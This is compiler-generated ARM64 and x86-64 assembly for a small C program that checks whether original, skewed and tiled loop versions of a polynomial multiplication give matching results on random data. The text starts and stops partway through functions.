ldr w8, [sp, #4] ldr w9, [sp, #8] adrp x10, _T@PAGE ldr w10, [x10, _T@PAGEOFF] add w9, w9, w10 subs w8, w8, w9 cset w8, hs tbnz w8, #0, LBB2_14 b LBB2_8 LBB2_8: ; in Loop: Header=BB2_7 Depth=3 ldr w8, [sp, #12] str w8, [sp] b LBB2_9 LBB2_9: ; Parent Loop BB2_1 Depth=1 ; Parent Loop BB2_3 Depth=2 ; Parent Loop BB2_7 Depth=3 ; => This Inner Loop Header: Depth=4 ldr w8, [sp] ldr w9, [sp, #12] adrp x10, _T@PAGE ldr w10, [x10, _T@PAGEOFF] subs w9, w9, w10 subs w8, w8, w9 cset w8, ls tbnz w8, #0, LBB2_12 b LBB2_10 LBB2_10: ; in Loop: Header=BB2_9 Depth=4 ldr x8, [sp, #24] ldr w9, [sp, #4] ldr w10, [sp] subs w9, w9, w10 ldr w8, [x8, w9, sxtw #2] ldr x9, [sp, #16] ldrsw x10, [sp] ldr w9, [x9, x10, lsl #2] mul w10, w8, w9 ldr x8, [sp, #32] ldrsw x9, [sp, #4] add x9, x8, x9, lsl #2 ldr w8, [x9] add w8, w8, w10 str w8, [x9] b LBB2_11 LBB2_11: ; in Loop: Header=BB2_9 Depth=4 ldr w8, [sp] subs w8, w8, #1 str w8, [sp] b LBB2_9 LBB2_12: ; in Loop: Header=BB2_7 Depth=3 b LBB2_13 LBB2_13: ; in Loop: Header=BB2_7 Depth=3 ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] b LBB2_7 LBB2_14: ; in Loop: Header=BB2_3 Depth=2 b LBB2_15 LBB2_15: ; in Loop: Header=BB2_3 Depth=2 ldr w8, [sp, #8] ldr w9, [sp, #12] adrp x10, _T@PAGE ldr w10, [x10, _T@PAGEOFF] subs w9, w9, w10 add w9, w9, #1 subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB2_25 b LBB2_16 LBB2_16: ; in Loop: Header=BB2_3 Depth=2 ldr w8, [sp, #8] str w8, [sp, #4] b LBB2_17 LBB2_17: ; Parent Loop BB2_1 Depth=1 ; Parent Loop BB2_3 Depth=2 ; => This Loop Header: Depth=3 ; Child Loop BB2_19 Depth 4 ldr w8, [sp, #4] ldr w9, [sp, #8] adrp x10, _T@PAGE ldr w10, [x10, _T@PAGEOFF] add w9, w9, w10 subs w8, w8, w9 cset w8, hs tbnz w8, #0, LBB2_24 b LBB2_18 LBB2_18: ; in Loop: Header=BB2_17 Depth=3 ldr w8, [sp, #4] str w8, [sp] b LBB2_19 LBB2_19: ; Parent Loop BB2_1 Depth=1 ; Parent Loop BB2_3 Depth=2 ; Parent Loop BB2_17 Depth=3 ; => This Inner Loop Header: Depth=4 ldr w8, [sp] ldr w9, [sp, #12] adrp x10, _T@PAGE ldr w10, [x10, _T@PAGEOFF] subs w9, w9, w10 subs w8, w8, w9 cset w8, ls tbnz w8, #0, LBB2_22 b LBB2_20 LBB2_20: ; in Loop: Header=BB2_19 Depth=4 ldr x8, [sp, #24] ldr w9, [sp, #4] ldr w10, [sp] subs w9, w9, w10 ldr w8, [x8, w9, sxtw #2] ldr x9, [sp, #16] ldrsw x10, [sp] ldr w9, [x9, x10, lsl #2] mul w10, w8, w9 ldr x8, [sp, #32] ldrsw x9, [sp, #4] add x9, x8, x9, lsl #2 ldr w8, [x9] add w8, w8, w10 str w8, [x9] b LBB2_21 LBB2_21: ; in Loop: Header=BB2_19 Depth=4 ldr w8, [sp] subs w8, w8, #1 str w8, [sp] b LBB2_19 LBB2_22: ; in Loop: Header=BB2_17 Depth=3 b LBB2_23 LBB2_23: ; in Loop: Header=BB2_17 Depth=3 ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] b LBB2_17 LBB2_24: ; in Loop: Header=BB2_3 Depth=2 b LBB2_25 LBB2_25: ; in Loop: Header=BB2_3 Depth=2 ldr w8, [sp, #8] ldr w9, [sp, #12] ldr w10, [sp, #44] add w9, w9, w10 add w9, w9, #1 adrp x10, _T@PAGE ldr w10, [x10, _T@PAGEOFF] subs w9, w9, w10 subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB2_35 b LBB2_26 LBB2_26: ; in Loop: Header=BB2_3 Depth=2 ldr w8, [sp, #8] str w8, [sp, #4] b LBB2_27 LBB2_27: ; Parent Loop BB2_1 Depth=1 ; Parent Loop BB2_3 Depth=2 ; => This Loop Header: Depth=3 ; Child Loop BB2_29 Depth 4 ldr w8, [sp, #4] ldr w9, [sp, #8] adrp x10, _T@PAGE ldr w10, [x10, _T@PAGEOFF] add w9, w9, w10 subs w8, w8, w9 cset w8, hs tbnz w8, #0, LBB2_34 b LBB2_28 LBB2_28: ; in Loop: Header=BB2_27 Depth=3 ldr w8, [sp, #12] str w8, [sp] b LBB2_29 LBB2_29: ; Parent Loop BB2_1 Depth=1 ; Parent Loop BB2_3 Depth=2 ; Parent Loop BB2_27 Depth=3 ; => This Inner Loop Header: Depth=4 ldr w8, [sp] ldr w9, [sp, #12] adrp x10, _T@PAGE ldr w10, [x10, _T@PAGEOFF] subs w9, w9, w10 ldr w10, [sp, #4] add w9, w9, w10 ldr w10, [sp, #8] subs w9, w9, w10 add w9, w9, #1 subs w8, w8, w9 cset w8, ls tbnz w8, #0, LBB2_32 b LBB2_30 LBB2_30: ; in Loop: Header=BB2_29 Depth=4 ldr x8, [sp, #24] ldr w9, [sp, #4] ldr w10, [sp] subs w9, w9, w10 ldr w8, [x8, w9, sxtw #2] ldr x9, [sp, #16] ldrsw x10, [sp] ldr w9, [x9, x10, lsl #2] mul w10, w8, w9 ldr x8, [sp, #32] ldrsw x9, [sp, #4] add x9, x8, x9, lsl #2 ldr w8, [x9] add w8, w8, w10 str w8, [x9] b LBB2_31 LBB2_31: ; in Loop: Header=BB2_29 Depth=4 ldr w8, [sp] subs w8, w8, #1 str w8, [sp] b LBB2_29 LBB2_32: ; in Loop: Header=BB2_27 Depth=3 b LBB2_33 LBB2_33: ; in Loop: Header=BB2_27 Depth=3 ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] b LBB2_27 LBB2_34: ; in Loop: Header=BB2_3 Depth=2 b LBB2_35 LBB2_35: ; in Loop: Header=BB2_3 Depth=2 b LBB2_36 LBB2_36: ; in Loop: Header=BB2_3 Depth=2 adrp x8, _T@PAGE ldr w9, [x8, _T@PAGEOFF] ldr w8, [sp, #8] add w8, w8, w9 str w8, [sp, #8] b LBB2_3 LBB2_37: ; in Loop: Header=BB2_1 Depth=1 b LBB2_38 LBB2_38: ; in Loop: Header=BB2_1 Depth=1 adrp x8, _T@PAGE ldr w9, [x8, _T@PAGEOFF] ldr w8, [sp, #12] subs w8, w8, w9 str w8, [sp, #12] b LBB2_1 LBB2_39: add sp, sp, #48 ret .cfi_endproc ; -- End function .globl __diff ; -- Begin function _diff .p2align 2 __diff: ; @_diff .cfi_startproc ; %bb.0: sub sp, sp, #128 .cfi_def_cfa_offset 128 stp x29, x30, [sp, #112] ; 16-byte Folded Spill add x29, sp, #112 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] stur w1, [x29, #-20] stur w2, [x29, #-24] stur w3, [x29, #-28] stur x4, [x29, #-40] stur x5, [x29, #-48] stur wzr, [x29, #-52] b LBB3_1 LBB3_1: ; =>This Loop Header: Depth=1 ; Child Loop BB3_3 Depth 2 ldur w8, [x29, #-52] ldur w9, [x29, #-24] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB3_10 b LBB3_2 LBB3_2: ; in Loop: Header=BB3_1 Depth=1 str wzr, [sp, #56] b LBB3_3 LBB3_3: ; Parent Loop BB3_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #56] ldur w9, [x29, #-28] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB3_8 b LBB3_4 LBB3_4: ; in Loop: Header=BB3_3 Depth=2 ldur x8, [x29, #-40] ldur w9, [x29, #-52] ldr w10, [sp, #56] add w9, w9, w10 ldr w8, [x8, w9, sxtw #2] ldur x9, [x29, #-48] ldur w10, [x29, #-52] ldr w11, [sp, #56] add w10, w10, w11 ldr w9, [x9, w10, sxtw #2] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB3_6 b LBB3_5 LBB3_5: ldur x15, [x29, #-16] ldur w8, [x29, #-20] ; implicit-def: $x13 mov x13, x8 ldur w8, [x29, #-52] ldr w9, [sp, #56] add w14, w8, w9 ldur w8, [x29, #-52] ; implicit-def: $x12 mov x12, x8 ldr w8, [sp, #56] ; implicit-def: $x11 mov x11, x8 ldur x8, [x29, #-40] ldur w9, [x29, #-52] ldr w10, [sp, #56] add w9, w9, w10 ldr w8, [x8, w9, sxtw #2] ; implicit-def: $x10 mov x10, x8 ldur x8, [x29, #-48] ldur w9, [x29, #-52] ldr w16, [sp, #56] add w9, w9, w16 ldr w9, [x8, w9, sxtw #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x15, [x9] str x13, [x9, #8] ; implicit-def: $x13 mov x13, x14 str x13, [x9, #16] str x12, [x9, #24] str x11, [x9, #32] str x10, [x9, #40] str x8, [x9, #48] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov w8, #1 stur w8, [x29, #-4] b LBB3_11 LBB3_6: ; in Loop: Header=BB3_3 Depth=2 b LBB3_7 LBB3_7: ; in Loop: Header=BB3_3 Depth=2 ldr w8, [sp, #56] add w8, w8, #1 str w8, [sp, #56] b LBB3_3 LBB3_8: ; in Loop: Header=BB3_1 Depth=1 b LBB3_9 LBB3_9: ; in Loop: Header=BB3_1 Depth=1 ldur w8, [x29, #-52] add w8, w8, #1 stur w8, [x29, #-52] b LBB3_1 LBB3_10: stur wzr, [x29, #-4] b LBB3_11 LBB3_11: ldur w0, [x29, #-4] ldp x29, x30, [sp, #112] ; 16-byte Folded Reload add sp, sp, #128 ret .cfi_endproc ; -- End function .globl _region ; -- Begin function region .p2align 2 _region: ; @region .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 sub sp, sp, #160 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] stur w0, [x29, #-12] stur w1, [x29, #-16] stur x2, [x29, #-24] stur x3, [x29, #-32] stur x4, [x29, #-40] ldur w8, [x29, #-12] ldur w9, [x29, #-16] add w8, w8, w9 ; kill: def $x8 killed $w8 mov x9, sp stur x9, [x29, #-72] lsl x9, x8, #2 add x9, x9, #15 and x9, x9, #0xfffffffffffffff0 stur x9, [x29, #-120] ; 8-byte Folded Spill adrp x16, ___chkstk_darwin@GOTPAGE ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF] blr x16 ldur x10, [x29, #-120] ; 8-byte Folded Reload mov x9, sp subs x0, x9, x10 stur x0, [x29, #-112] ; 8-byte Folded Spill mov sp, x0 stur x8, [x29, #-80] ldur w8, [x29, #-12] ldur w9, [x29, #-16] add w8, w8, w9 ; kill: def $x8 killed $w8 lsl x9, x8, #2 add x9, x9, #15 and x9, x9, #0xfffffffffffffff0 stur x9, [x29, #-104] ; 8-byte Folded Spill adrp x16, ___chkstk_darwin@GOTPAGE ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF] blr x16 ldur x10, [x29, #-104] ; 8-byte Folded Reload mov x9, sp subs x0, x9, x10 stur x0, [x29, #-96] ; 8-byte Folded Spill mov sp, x0 stur x8, [x29, #-88] stur wzr, [x29, #-60] b LBB4_1 LBB4_1: ; =>This Loop Header: Depth=1 ; Child Loop BB4_3 Depth 2 ldur w8, [x29, #-60] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB4_8 b LBB4_2 LBB4_2: ; in Loop: Header=BB4_1 Depth=1 stur wzr, [x29, #-64] b LBB4_3 LBB4_3: ; Parent Loop BB4_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-64] ldur w9, [x29, #-16] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB4_6 b LBB4_4 LBB4_4: ; in Loop: Header=BB4_3 Depth=2 ldur x9, [x29, #-24] ldur w8, [x29, #-60] ldur w10, [x29, #-64] add w10, w8, w10 mov w8, #0 str w8, [x9, w10, sxtw #2] bl _rand ldur x8, [x29, #-32] ldursw x9, [x29, #-60] str w0, [x8, x9, lsl #2] bl _rand ldur x8, [x29, #-40] ldursw x9, [x29, #-64] str w0, [x8, x9, lsl #2] b LBB4_5 LBB4_5: ; in Loop: Header=BB4_3 Depth=2 ldur w8, [x29, #-64] add w8, w8, #1 stur w8, [x29, #-64] b LBB4_3 LBB4_6: ; in Loop: Header=BB4_1 Depth=1 b LBB4_7 LBB4_7: ; in Loop: Header=BB4_1 Depth=1 ldur w8, [x29, #-60] add w8, w8, #1 stur w8, [x29, #-60] b LBB4_1 LBB4_8: ldur x0, [x29, #-96] ; 8-byte Folded Reload ldur x1, [x29, #-24] ldur w8, [x29, #-12] ldur w9, [x29, #-16] add w9, w8, w9 ; implicit-def: $x8 mov x8, x9 sxtw x9, w8 mov x8, #4 stur x8, [x29, #-152] ; 8-byte Folded Spill mul x2, x8, x9 mov x3, #-1 stur x3, [x29, #-144] ; 8-byte Folded Spill bl ___memcpy_chk ldur w0, [x29, #-12] ldur w1, [x29, #-16] ldur x2, [x29, #-24] ldur x3, [x29, #-32] ldur x4, [x29, #-40] bl _orig ldur x8, [x29, #-152] ; 8-byte Folded Reload ldur x3, [x29, #-144] ; 8-byte Folded Reload ldur x0, [x29, #-112] ; 8-byte Folded Reload ldur x1, [x29, #-24] ldur w9, [x29, #-12] ldur w10, [x29, #-16] add w10, w9, w10 ; implicit-def: $x9 mov x9, x10 sxtw x9, w9 mul x2, x8, x9 bl ___memcpy_chk ldur x5, [x29, #-112] ; 8-byte Folded Reload ldur w2, [x29, #-16] ldur w3, [x29, #-12] ldur x4, [x29, #-24] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF stur x0, [x29, #-136] ; 8-byte Folded Spill mov w1, #98 bl __diff ldur x8, [x29, #-152] ; 8-byte Folded Reload ldur x1, [x29, #-96] ; 8-byte Folded Reload ldur x3, [x29, #-144] ; 8-byte Folded Reload ldur x0, [x29, #-24] ldur w9, [x29, #-12] ldur w10, [x29, #-16] add w10, w9, w10 ; implicit-def: $x9 mov x9, x10 sxtw x9, w9 mul x2, x8, x9 bl ___memcpy_chk ldur w0, [x29, #-12] ldur w1, [x29, #-16] ldur x2, [x29, #-24] ldur x3, [x29, #-32] ldur x4, [x29, #-40] bl _skewed ldur x0, [x29, #-136] ; 8-byte Folded Reload ldur x5, [x29, #-112] ; 8-byte Folded Reload ldur w2, [x29, #-16] ldur w3, [x29, #-12] ldur x4, [x29, #-24] mov w1, #103 bl __diff ldur x8, [x29, #-152] ; 8-byte Folded Reload ldur x1, [x29, #-96] ; 8-byte Folded Reload ldur x3, [x29, #-144] ; 8-byte Folded Reload ldur x0, [x29, #-24] ldur w9, [x29, #-12] ldur w10, [x29, #-16] add w10, w9, w10 ; implicit-def: $x9 mov x9, x10 sxtw x9, w9 mul x2, x8, x9 bl ___memcpy_chk ldur w0, [x29, #-12] ldur w1, [x29, #-16] ldur x2, [x29, #-24] ldur x3, [x29, #-32] ldur x4, [x29, #-40] bl _tiled ldur x0, [x29, #-136] ; 8-byte Folded Reload ldur x5, [x29, #-112] ; 8-byte Folded Reload ldur w2, [x29, #-16] ldur w3, [x29, #-12] ldur x4, [x29, #-24] mov w1, #107 bl __diff ldur x8, [x29, #-72] stur x8, [x29, #-128] ; 8-byte Folded Spill ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB4_10 b LBB4_9 LBB4_9: bl ___stack_chk_fail LBB4_10: ldur x8, [x29, #-128] ; 8-byte Folded Reload mov sp, x8 mov w0, #0 mov sp, x29 ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 sub sp, sp, #96 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] stur wzr, [x29, #-12] stur w0, [x29, #-16] stur x1, [x29, #-24] ldur w8, [x29, #-16] subs w8, w8, #2 cset w8, lt tbnz w8, #0, LBB5_2 b LBB5_1 LBB5_1: ldur x8, [x29, #-24] ldr x0, [x8, #8] bl _atoi adrp x8, _T@PAGE str w0, [x8, _T@PAGEOFF] b LBB5_2 LBB5_2: adrp x8, _T@PAGE ldr w10, [x8, _T@PAGEOFF] mov w9, #2 mul w9, w9, w10 stur w9, [x29, #-28] ldr w9, [x8, _T@PAGEOFF] mov w8, #4 mul w8, w8, w9 stur w8, [x29, #-32] ldur w8, [x29, #-16] subs w8, w8, #3 cset w8, lt tbnz w8, #0, LBB5_4 b LBB5_3 LBB5_3: ldur x8, [x29, #-24] ldr x0, [x8, #16] bl _atoi adrp x8, _T@PAGE ldr w8, [x8, _T@PAGEOFF] mul w8, w0, w8 stur w8, [x29, #-28] b LBB5_4 LBB5_4: ldur w8, [x29, #-16] subs w8, w8, #4 cset w8, lt tbnz w8, #0, LBB5_6 b LBB5_5 LBB5_5: ldur x8, [x29, #-24] ldr x0, [x8, #24] bl _atoi adrp x8, _T@PAGE ldr w8, [x8, _T@PAGEOFF] mul w8, w0, w8 stur w8, [x29, #-32] b LBB5_6 LBB5_6: ldur w8, [x29, #-28] ; kill: def $x8 killed $w8 mov x9, sp stur x9, [x29, #-40] lsl x9, x8, #2 add x9, x9, #15 and x9, x9, #0xfffffffffffffff0 stur x9, [x29, #-96] ; 8-byte Folded Spill adrp x16, ___chkstk_darwin@GOTPAGE ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF] blr x16 ldur x10, [x29, #-96] ; 8-byte Folded Reload mov x9, sp subs x3, x9, x10 mov sp, x3 stur x8, [x29, #-48] ldur w8, [x29, #-32] ; kill: def $x8 killed $w8 lsl x9, x8, #2 add x9, x9, #15 and x9, x9, #0xfffffffffffffff0 stur x9, [x29, #-88] ; 8-byte Folded Spill adrp x16, ___chkstk_darwin@GOTPAGE ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF] blr x16 ldur x10, [x29, #-88] ; 8-byte Folded Reload mov x9, sp subs x4, x9, x10 mov sp, x4 stur x8, [x29, #-56] ldur w8, [x29, #-28] ldur w9, [x29, #-32] add w8, w8, w9 ; kill: def $x8 killed $w8 lsl x9, x8, #2 add x9, x9, #15 and x9, x9, #0xfffffffffffffff0 stur x9, [x29, #-80] ; 8-byte Folded Spill adrp x16, ___chkstk_darwin@GOTPAGE ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF] blr x16 ldur x10, [x29, #-80] ; 8-byte Folded Reload mov x9, sp subs x2, x9, x10 mov sp, x2 stur x8, [x29, #-64] ldur w0, [x29, #-28] ldur w1, [x29, #-32] bl _region ldur x8, [x29, #-40] mov sp, x8 ldur w8, [x29, #-12] stur w8, [x29, #-68] ; 4-byte Folded Spill ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB5_8 b LBB5_7 LBB5_7: bl ___stack_chk_fail LBB5_8: ldur w0, [x29, #-68] ; 4-byte Folded Reload mov sp, x29 ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .section __DATA,__data .globl _T ; @T .p2align 2 _T: .long 10 ; 0xa .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%s:%d ! Diff %d (%d-%d) : %d %d\n" l_.str.1: ; @.str.1 .asciz "the_stack_data/136098.c" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _orig ## -- Begin function orig .p2align 4, 0x90 _orig: ## @orig .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl %esi, -8(%rbp) movq %rdx, -16(%rbp) movq %rcx, -24(%rbp) movq %r8, -32(%rbp) movl $0, -36(%rbp) LBB0_1: ## =>This Loop Header: Depth=1 ## Child Loop BB0_3 Depth 2 movl -36(%rbp), %eax cmpl -4(%rbp), %eax jge LBB0_8 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl $0, -40(%rbp) LBB0_3: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -40(%rbp), %eax cmpl -8(%rbp), %eax jge LBB0_6 ## %bb.4: ## in Loop: Header=BB0_3 Depth=2 movq -24(%rbp), %rax movslq -36(%rbp), %rcx movl (%rax,%rcx,4), %edx movq -32(%rbp), %rax movslq -40(%rbp), %rcx imull (%rax,%rcx,4), %edx movq -16(%rbp), %rax movl -36(%rbp), %ecx addl -40(%rbp), %ecx movslq %ecx, %rcx addl (%rax,%rcx,4), %edx movl %edx, (%rax,%rcx,4) ## %bb.5: ## in Loop: Header=BB0_3 Depth=2 movl -40(%rbp), %eax addl $1, %eax movl %eax, -40(%rbp) jmp LBB0_3 LBB0_6: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_7 LBB0_7: ## in Loop: Header=BB0_1 Depth=1 movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB0_1 LBB0_8: popq %rbp retq .cfi_endproc ## -- End function .globl _skewed ## -- Begin function skewed .p2align 4, 0x90 _skewed: ## @skewed .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl %esi, -8(%rbp) movq %rdx, -16(%rbp) movq %rcx, -24(%rbp) movq %r8, -32(%rbp) movl $0, -40(%rbp) LBB1_1: ## =>This Loop Header: Depth=1 ## Child Loop BB1_3 Depth 2 movl -40(%rbp), %eax cmpl -8(%rbp), %eax jge LBB1_8 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movl -40(%rbp), %eax movl %eax, -36(%rbp) LBB1_3: ## Parent Loop BB1_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -36(%rbp), %eax movl -40(%rbp), %ecx addl -4(%rbp), %ecx cmpl %ecx, %eax jge LBB1_6 ## %bb.4: ## in Loop: Header=BB1_3 Depth=2 movq -24(%rbp), %rax movl -36(%rbp), %ecx subl -40(%rbp), %ecx movslq %ecx, %rcx movl (%rax,%rcx,4), %edx movq -32(%rbp), %rax movslq -40(%rbp), %rcx imull (%rax,%rcx,4), %edx movq -16(%rbp), %rax movslq -36(%rbp), %rcx addl (%rax,%rcx,4), %edx movl %edx, (%rax,%rcx,4) ## %bb.5: ## in Loop: Header=BB1_3 Depth=2 movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB1_3 LBB1_6: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_7 LBB1_7: ## in Loop: Header=BB1_1 Depth=1 movl -40(%rbp), %eax addl $1, %eax movl %eax, -40(%rbp) jmp LBB1_1 LBB1_8: popq %rbp retq .cfi_endproc ## -- End function .globl _tiled ## -- Begin function tiled .p2align 4, 0x90 _tiled: ## @tiled .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl %esi, -8(%rbp) movq %rdx, -16(%rbp) movq %rcx, -24(%rbp) movq %r8, -32(%rbp) movl -8(%rbp), %eax subl $1, %eax movl %eax, -36(%rbp) LBB2_1: ## =>This Loop Header: Depth=1 ## Child Loop BB2_3 Depth 2 ## Child Loop BB2_7 Depth 3 ## Child Loop BB2_9 Depth 4 ## Child Loop BB2_17 Depth 3 ## Child Loop BB2_19 Depth 4 ## Child Loop BB2_27 Depth 3 ## Child Loop BB2_29 Depth 4 movl -36(%rbp), %eax movl _T(%rip), %ecx subl $1, %ecx cmpl %ecx, %eax jb LBB2_39 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 movl -36(%rbp), %eax subl _T(%rip), %eax addl $1, %eax movl %eax, -40(%rbp) LBB2_3: ## Parent Loop BB2_1 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB2_7 Depth 3 ## Child Loop BB2_9 Depth 4 ## Child Loop BB2_17 Depth 3 ## Child Loop BB2_19 Depth 4 ## Child Loop BB2_27 Depth 3 ## Child Loop BB2_29 Depth 4 movl -40(%rbp), %eax movl -36(%rbp), %ecx addl -4(%rbp), %ecx addl $1, %ecx cmpl %ecx, %eax jg LBB2_37 ## %bb.4: ## in Loop: Header=BB2_3 Depth=2 movl -40(%rbp), %eax cmpl -36(%rbp), %eax jle LBB2_15 ## %bb.5: ## in Loop: Header=BB2_3 Depth=2 movl -40(%rbp), %eax movl -36(%rbp), %ecx addl -4(%rbp), %ecx subl _T(%rip), %ecx cmpl %ecx, %eax ja LBB2_15 ## %bb.6: ## in Loop: Header=BB2_3 Depth=2 movl -40(%rbp), %eax movl %eax, -44(%rbp) LBB2_7: ## Parent Loop BB2_1 Depth=1 ## Parent Loop BB2_3 Depth=2 ## => This Loop Header: Depth=3 ## Child Loop BB2_9 Depth 4 movl -44(%rbp), %eax movl -40(%rbp), %ecx addl _T(%rip), %ecx cmpl %ecx, %eax jae LBB2_14 ## %bb.8: ## in Loop: Header=BB2_7 Depth=3 movl -36(%rbp), %eax movl %eax, -48(%rbp) LBB2_9: ## Parent Loop BB2_1 Depth=1 ## Parent Loop BB2_3 Depth=2 ## Parent Loop BB2_7 Depth=3 ## => This Inner Loop Header: Depth=4 movl -48(%rbp), %eax movl -36(%rbp), %ecx subl _T(%rip), %ecx cmpl %ecx, %eax jbe LBB2_12 ## %bb.10: ## in Loop: Header=BB2_9 Depth=4 movq -24(%rbp), %rax movl -44(%rbp), %ecx subl -48(%rbp), %ecx movslq %ecx, %rcx movl (%rax,%rcx,4), %edx movq -32(%rbp), %rax movslq -48(%rbp), %rcx imull (%rax,%rcx,4), %edx movq -16(%rbp), %rax movslq -44(%rbp), %rcx addl (%rax,%rcx,4), %edx movl %edx, (%rax,%rcx,4) ## %bb.11: ## in Loop: Header=BB2_9 Depth=4 movl -48(%rbp), %eax addl $-1, %eax movl %eax, -48(%rbp) jmp LBB2_9 LBB2_12: ## in Loop: Header=BB2_7 Depth=3 jmp LBB2_13 LBB2_13: ## in Loop: Header=BB2_7 Depth=3 movl -44(%rbp), %eax addl $1, %eax movl %eax, -44(%rbp) jmp LBB2_7 LBB2_14: ## in Loop: Header=BB2_3 Depth=2 jmp LBB2_15 LBB2_15: ## in Loop: Header=BB2_3 Depth=2 movl -40(%rbp), %eax movl -36(%rbp), %ecx subl _T(%rip), %ecx addl $1, %ecx cmpl %ecx, %eax jne LBB2_25 ## %bb.16: ## in Loop: Header=BB2_3 Depth=2 movl -40(%rbp), %eax movl %eax, -44(%rbp) LBB2_17: ## Parent Loop BB2_1 Depth=1 ## Parent Loop BB2_3 Depth=2 ## => This Loop Header: Depth=3 ## Child Loop BB2_19 Depth 4 movl -44(%rbp), %eax movl -40(%rbp), %ecx addl _T(%rip), %ecx cmpl %ecx, %eax jae LBB2_24 ## %bb.18: ## in Loop: Header=BB2_17 Depth=3 movl -44(%rbp), %eax movl %eax, -48(%rbp) LBB2_19: ## Parent Loop BB2_1 Depth=1 ## Parent Loop BB2_3 Depth=2 ## Parent Loop BB2_17 Depth=3 ## => This Inner Loop Header: Depth=4 movl -48(%rbp), %eax movl -36(%rbp), %ecx subl _T(%rip), %ecx cmpl %ecx, %eax jbe LBB2_22 ## %bb.20: ## in Loop: Header=BB2_19 Depth=4 movq -24(%rbp), %rax movl -44(%rbp), %ecx subl -48(%rbp), %ecx movslq %ecx, %rcx movl (%rax,%rcx,4), %edx movq -32(%rbp), %rax movslq -48(%rbp), %rcx imull (%rax,%rcx,4), %edx movq -16(%rbp), %rax movslq -44(%rbp), %rcx addl (%rax,%rcx,4), %edx movl %edx, (%rax,%rcx,4) ## %bb.21: ## in Loop: Header=BB2_19 Depth=4 movl -48(%rbp), %eax addl $-1, %eax movl %eax, -48(%rbp) jmp LBB2_19 LBB2_22: ## in Loop: Header=BB2_17 Depth=3 jmp LBB2_23 LBB2_23: ## in Loop: Header=BB2_17 Depth=3 movl -44(%rbp), %eax addl $1, %eax movl %eax, -44(%rbp) jmp LBB2_17 LBB2_24: ## in Loop: Header=BB2_3 Depth=2 jmp LBB2_25 LBB2_25: ## in Loop: Header=BB2_3 Depth=2 movl -40(%rbp), %eax movl -36(%rbp), %ecx addl -4(%rbp), %ecx addl $1, %ecx subl _T(%rip), %ecx cmpl %ecx, %eax jne LBB2_35 ## %bb.26: ## in Loop: Header=BB2_3 Depth=2 movl -40(%rbp), %eax movl %eax, -44(%rbp) LBB2_27: ## Parent Loop BB2_1 Depth=1 ## Parent Loop BB2_3 Depth=2 ## => This Loop Header: Depth=3 ## Child Loop BB2_29 Depth 4 movl -44(%rbp), %eax movl -40(%rbp), 